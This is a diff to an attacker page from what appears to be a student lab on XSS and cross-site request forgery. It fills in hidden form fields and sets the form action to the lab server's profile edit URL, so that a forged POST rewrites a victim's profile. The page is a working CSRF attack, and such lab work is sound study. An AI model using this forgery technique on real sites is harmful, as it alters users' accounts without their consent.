--- a/HW2_3_XSS_Forgery/Labsetup/attacker/editprofile.html
+++ b/HW2_3_XSS_Forgery/Labsetup/attacker/editprofile.html
@@ -9,16 +9,16 @@ function forge_post()
 
     // The following are form entries need to be filled out by attackers.
     // The entries are made hidden, so the victim won't be able to see them.
-    fields += "<input type='hidden' name='name' value='****'>";
-    fields += "<input type='hidden' name='briefdescription' value='****'>";
+    fields += "<input type='hidden' name='name' value='Alice'>";
+    fields += "<input type='text' name='briefdescription' value='Samy is my best friend!'>";
     fields += "<input type='hidden' name='accesslevel[briefdescription]' value='2'>";         
-    fields += "<input type='hidden' name='guid' value='****'>";
+    fields += "<input type='hidden' name='guid' value='56'>";
 
     // Create a <form> element.
     var p = document.createElement("form");
 
     // Construct the form
-    p.action = "http://www.example.com";
+    p.action = "http://www.seed-server.com/profile/Alice/";
     p.innerHTML = fields;
     p.method = "post";
 
